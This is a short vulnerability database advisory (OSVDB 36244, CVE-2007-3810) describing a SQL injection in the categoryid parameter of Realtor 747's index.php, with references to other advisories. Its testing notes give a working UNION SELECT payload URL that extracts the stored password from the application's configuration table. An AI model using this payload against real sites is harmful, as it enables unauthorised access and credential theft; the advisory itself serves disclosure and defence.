Realtor 747 index.php categoryid Variable SQL Injection

2007-07-14T00:00:00
ID OSVDB:36244
Type osvdb
Reporter OSVDB
Modified 2007-07-14T00:00:00

Description

Manual Testing Notes

http://[target]/realtor747/index.php?pageid=2&categoryid=-1//UNION//ALL//SELECT//1,2,config_value,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21//FROM//AD747_CONFIG%20where/*/config_key=0x70617373776F7264/

References:

Secunia Advisory ID: 26068
Other Advisory URL: http://www.milw0rm.com/exploits/4184
ISS X-Force ID: 35420
FrSIRT Advisory: ADV-2007-2541
CVE-2007-3810
Bugtraq ID: 24916